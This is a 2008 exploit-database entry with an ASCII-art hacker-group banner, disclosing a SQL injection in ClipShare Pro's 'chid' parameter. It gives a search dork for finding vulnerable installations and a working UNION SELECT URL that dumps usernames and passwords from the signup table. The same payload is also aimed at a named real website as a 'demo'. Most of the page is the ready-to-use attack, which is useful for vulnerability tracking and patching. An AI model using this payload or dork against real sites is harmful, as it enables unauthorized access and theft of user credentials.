ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability



EDB-ID: 7128 CVE: 2008-5489 OSVDB-ID: 50009
Author: snakespc Published: 2008-11-15 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=                          Script: clipShare Remote SQL Injection Vulnerability                                  +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =      =                 :::::Mail: snakespc@gmail.com:::::::              =         =
                =                                                                                    =
                =                            script:http://www.clip-share.com                        =
                =                                                                                    =
                =                               channel_detail.php?chid=                             =              
                 =================================== Snakespc ======================================    
D0rk: clipshare/channel_detail.php?chid=
Dork: Powered By SalSa Creations

Exploit:

http://localhost/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- 

Demo :

http://www.salsavidz.com/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- 	
                                                                      
===================================================================================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
ALL www.Snakespc.com/SC >>>> Members 
str0ke.....>>>>.....milw0rm
===================================================================================================================

# milw0rm.com [2008-11-15]